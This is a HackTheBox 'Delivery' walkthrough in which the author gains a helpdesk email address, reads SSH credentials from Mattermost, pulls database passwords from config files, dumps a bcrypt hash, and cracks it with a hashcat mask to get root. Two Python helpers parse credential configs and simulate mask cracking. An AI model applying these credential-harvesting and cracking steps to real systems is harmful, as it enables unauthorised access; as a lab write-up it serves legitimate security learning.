An easy Linux box from HackTheBox. Abuse osTicket's per-ticket email addresses to get a mailbox on the domain, register on the Mattermost instance with it and read the messages from root containing plaintext SSH creds and a password hint, then pull the Mattermost admin's bcrypt hash from the database and crack it with a mask attack for root.

Recon

Running the usual nmap

georgy@pop-os:~/Documents/htb/delivery$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.222

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c40fa859b01acac0ebc0c19518aee27 (RSA)
|   256 5a0cc03b9b76552e6ec4f4b95d761709 (ECDSA)
|_  256 b79df7489da2f27630fd42d3353a808c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Pretty much the only attack surface is the web server; the home page itself has very little on it.

Snooping around for links, the “HelpDesk” link on the homepage goes to helpdesk.delivery.htb, and the “Contact Us” page links to delivery.htb:8065

Add delivery.htb and helpdesk.delivery.htb to /etc/hosts

On the helpdesk side (osTicket), searchsploit turns up an SSRF triggered when submitting tickets; this turned out to be a rabbit hole.

On port 8065 there is a Mattermost instance. We can start creating an account, but get blocked at email verification: a link is sent to the address we register with and we have to click it, so external domains like @gmail.com don't get us anywhere.

Also should note that the “Contact Us” page specifies

Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.

So we need a delivery.htb address

Let's submit a ticket with random info just to try it, and notice that on submission we are given an email address built from the ticket number: anything mailed to it gets appended to the ticket.

In my case my email is 6227474@delivery.htb

Now maybe we can use this email to sign up, and see the verification link in the ticket details?

Exploitation

Sign up with 6227474@delivery.htb and a password of Password1!, then go back and view our ticket

And there is the verification link, delivered into the ticket.

Using that, we get access to the Mattermost instance, and in the messages from root immediately see creds for the mail user

maildeliverer:Youve_G0t_Mail!

As well as a hint for privesc: hashes on the box will crack against variations of PleaseSubscribe!

Can now get a shell over SSH with those creds

georgy@pop-os:~/Documents/htb/delivery$ ssh maildeliverer@delivery.htb
maildeliverer@delivery.htb's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct  7 19:08:25 2022 from 10.10.14.13
maildeliverer@Delivery:~$ whoami
maildeliverer

Doing the usual enumeration, find a MySQL/MariaDB server bound to localhost on 3306 (so it is only reachable from the box itself)

maildeliverer@Delivery:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer

...

tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)

...

Both osTicket and Mattermost run on a MariaDB backend, so the DB creds should be sitting in one of their config files.

Googling where osTicket keeps its SQL creds points to include/ost-config.php, so search for it

maildeliverer@Delivery:/var$ find ./ -name '*conf*.php' 2>/dev/null
./www/osticket/upload/include/ost-sampleconfig.php
./www/osticket/upload/include/client/register.confirm.inc.php
./www/osticket/upload/include/client/register.confirmed.inc.php
./www/osticket/upload/include/class.config.php
./www/osticket/upload/include/staff/templates/confirm.tmpl.php
./www/osticket/upload/include/staff/templates/dynamic-field-config.tmpl.php
./www/osticket/upload/include/ost-config.php
./www/osticket/upload/include/ajax.config.php

Catting it out, the creds are right there in plaintext

# Mysql Login info
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');

Connecting with those creds (the ! in the password needs quoting so bash doesn't treat it as history expansion) and looking at the staff table, see that the only staff user is maildeliverer, which we already are, so nothing new here

maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -u ost_user --database=osticket --password='!H3lpD3sk123!'


mysql> select * from ost_staff;

...

|        1 |       1 |       1 | maildeliverer | Delivery  | Person   | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy | NULL    | maildeliverer@delivery.htb |       | NULL      |        |           | NULL | NULL     

...

So move on to Mattermost, which lives in /opt/, and search it for config files

maildeliverer@Delivery:/opt$ find ./ -name '*conf*' 2>/dev/null
./mattermost/config
./mattermost/config/config.json

Cat out the JSON and find the SQL creds in SqlSettings.DataSource, a Go MySQL DSN of the form user:password@tcp(host:port)/db (the \u0026 is just a JSON-escaped &). Note the same block also exposes AtRestEncryptKey.

    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    }
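The two config files above hold the same kind of secret in two different shapes: PHP define() constants in osTicket's ost-config.php and a Go MySQL DSN in Mattermost's config.json. Below is a small Python helper added to this writeup (not code from either project or from the box) that pulls both into one structure and builds a correctly quoted mysql command line. The two inputs are constructed samples modelled on the fragments quoted above. The DSN parser follows go-sql-driver/mysql's rule: the database name starts at the last '/', and the credential block ends at the last '@' before it, so passwords containing '@' or ':' are handled.

```python
import json
import re
import shlex

# Constructed sample modelled on the ost-config.php fragment in this writeup.
OST_CONFIG = """
# Mysql Login info
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');
"""

# Constructed sample modelled on the config.json fragment. Raw string, so that
# json.loads (not the Python parser) turns the \u0026 escapes into '&'.
MM_CONFIG_JSON = r"""
{
  "SqlSettings": {
    "DriverName": "mysql",
    "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s"
  }
}
"""

# define('DBUSER','ost_user');  ->  ('DBUSER', 'ost_user'); tolerates \' inside the value
_DEFINE = re.compile(r"define\(\s*'(DB[A-Z]+)'\s*,\s*'((?:[^'\\]|\\.)*)'\s*\)")


def parse_ost_config(text):
    """Return the DB* constants of an osTicket ost-config.php as a dict."""
    creds = {}
    for name, raw in _DEFINE.findall(text):
        creds[name] = raw.replace("\\'", "'").replace("\\\\", "\\")
    return creds


def parse_mysql_dsn(dsn):
    """Split a go-sql-driver/mysql DSN:
    [user[:password]@][protocol[(address)]]/dbname[?k=v&...]"""
    head, slash, tail = dsn.rpartition("/")          # dbname starts at the LAST '/'
    if not slash:
        raise ValueError("DSN has no '/' before the database name")
    dbname, _, query = tail.partition("?")
    userinfo, at, netpart = head.rpartition("@")      # creds end at the LAST '@'
    if not at:
        userinfo, netpart = "", head
    user, _, password = userinfo.partition(":")       # password may itself contain ':'
    protocol, paren, rest = netpart.partition("(")
    address = rest[:-1] if paren and rest.endswith(")") else ""
    if protocol in ("", "tcp") and not address:
        address = "127.0.0.1:3306"                    # the driver's default for tcp
    host, colon, port = address.rpartition(":")
    if not colon:
        host, port = address, "3306"
    params = {}
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            params[key] = value
    return {"user": user, "password": password, "protocol": protocol or "tcp",
            "host": host, "port": port, "dbname": dbname, "params": params}


def mysql_command(user, password, host, port, dbname):
    """Build a mysql CLI invocation, quoted so a '!' in the password survives bash."""
    argv = ["mysql", "-h", host, "-P", port, "-u", user,
            f"--password={password}", f"--database={dbname}"]
    return shlex.join(argv)


def collect_creds():
    """Normalise both configs into (source, user, password, host, port, db) tuples."""
    ost = parse_ost_config(OST_CONFIG)
    ost_host, _, ost_port = ost["DBHOST"].partition(":")
    mm = parse_mysql_dsn(json.loads(MM_CONFIG_JSON)["SqlSettings"]["DataSource"])
    return [
        ("osticket", ost["DBUSER"], ost["DBPASS"], ost_host, ost_port or "3306", ost["DBNAME"]),
        ("mattermost", mm["user"], mm["password"], mm["host"], mm["port"], mm["dbname"]),
    ]


if __name__ == "__main__":
    for source, user, password, host, port, db in collect_creds():
        print(f"[{source}] {mysql_command(user, password, host, port, db)}")
```

One caveat on the generated command: a password passed with --password= ends up in shell history and in the process list for anyone running ps. Fine on a CTF box, but on a real engagement use the bare -p prompt or a mode-600 ~/.my.cnf instead.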

So dump the Users table inside the mattermost database

maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -u mmuser --password=Crack_The_MM_Admin_PW
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 125
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> select * from Users;

...dumped...

And see the root user, and their hash

| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 |        0 | root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL     |             | root@delivery.htb       |             1 |          |                    |          |          | system_admin system_user |              1 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1609157893370 |                 0 |              0 | en     | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"}  |         0 |           |
root : $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO

Now, like the message said, we can use hashcat with “PleaseSubscribe!” as a literal prefix and brute-force only the tail. -m 3200 is bcrypt (the $2a$10$ means cost factor 10, so every guess is expensive and the keyspace has to stay small), -1 ?l?u?d defines a custom charset of letters and digits, the mask appends up to four of those, and --increment --increment-min 17 starts at one appended character (the prefix alone is 16) instead of wasting runs on the prefix by itself.

georgy@pop-os:~/Documents/htb/delivery$ hashcat -m 3200 hash.txt -a 3 -1 '?l?u?d' 'PleaseSubscribe!?1?1?1?1' --increment --increment-min 17

...

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Cracked to be root:PleaseSubscribe!21
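To make the mask above concrete, here is a small Python model of hashcat's mask syntax written for this writeup (not hashcat's own code, and a simplification: custom charsets may only reference the built-in ones). It shows what --increment does to the keyspace, why --increment-min 17 matters when the literal prefix is 16 characters long, and walks the candidates in the same order with a pluggable verifier. The bcrypt check is stood in for by a constructed sha256 target so the block runs offline; against the real hash you would plug in bcrypt.checkpw from the third-party bcrypt package.

```python
import hashlib
import itertools
import string

# hashcat's built-in charsets (?b, raw bytes 0x00-0xff, is left out)
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def _tokens(spec, custom):
    """Yield one charset string per position of a mask or charset spec.
    '?l' etc. are built-ins, '?1'..'?4' the -1..-4 custom sets, '??' a literal '?',
    anything else is a literal character (a charset of size one)."""
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            name = spec[i + 1]
            i += 2
            if name == "?":
                yield "?"
            elif name in BUILTIN:
                yield BUILTIN[name]
            elif name in custom:
                yield custom[name]
            else:
                raise ValueError(f"unknown charset ?{name}")
        else:
            yield spec[i]
            i += 1


def expand_charset(spec):
    """Expand a -1 style spec such as '?l?u?d' or 'abc?d' into its characters (deduped, order kept)."""
    out = []
    for chars in _tokens(spec, {}):          # custom sets may only use built-ins here
        for ch in chars:
            if ch not in out:
                out.append(ch)
    return "".join(out)


def parse_mask(mask, custom=None):
    """Turn a mask into a list with one charset string per position."""
    expanded = {k: expand_charset(v) for k, v in (custom or {}).items()}
    return list(_tokens(mask, expanded))


def keyspace(positions):
    n = 1
    for cs in positions:
        n *= len(cs)
    return n


def increment_lengths(positions, increment=False, increment_min=1, increment_max=None):
    """Lengths hashcat will run: the full mask, or with --increment every prefix
    of the mask from --increment-min up to --increment-max (default: full length)."""
    full = len(positions)
    if not increment:
        return [full]
    hi = min(increment_max or full, full)
    return list(range(max(increment_min, 1), hi + 1))


def total_keyspace(mask, custom=None, increment=False, increment_min=1, increment_max=None):
    pos = parse_mask(mask, custom)
    return sum(keyspace(pos[:n]) for n in increment_lengths(pos, increment, increment_min, increment_max))


def candidates(mask, custom=None, increment=False, increment_min=1, increment_max=None):
    pos = parse_mask(mask, custom)
    for n in increment_lengths(pos, increment, increment_min, increment_max):
        for combo in itertools.product(*pos[:n]):
            yield "".join(combo)


def crack(mask, verify, **opts):
    """Run the mask attack against any verifier; returns (password, guesses tried)."""
    tried = 0
    for cand in candidates(mask, **opts):
        tried += 1
        if verify(cand):
            return cand, tried
    return None, tried


# Constructed stand-in for the bcrypt check so this runs offline; the real
# verifier would be bcrypt.checkpw(cand.encode(), b"$2a$10$...").
TARGET = hashlib.sha256(b"PleaseSubscribe!21").hexdigest()


def verify_sha256(cand):
    return hashlib.sha256(cand.encode()).hexdigest() == TARGET


if __name__ == "__main__":
    mask, custom = "PleaseSubscribe!?1?1?1?1", {"1": "?l?u?d"}
    print("keyspace, --increment --increment-min 17:", total_keyspace(mask, custom, True, 17))
    print("keyspace, --increment with default min:  ", total_keyspace(mask, custom, True))
    print(crack(mask, verify_sha256, custom=custom, increment=True, increment_min=17))
```

The difference between the two keyspace numbers is only 16 guesses, so on this box --increment-min is about tidiness rather than speed; the part that actually matters at bcrypt cost 10 is capping the tail at four characters instead of letting the mask run open-ended.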

Now can su to root

maildeliverer@Delivery:/opt$ su root
Password: 
root@Delivery:/opt# whoami
root
root@Delivery:/opt#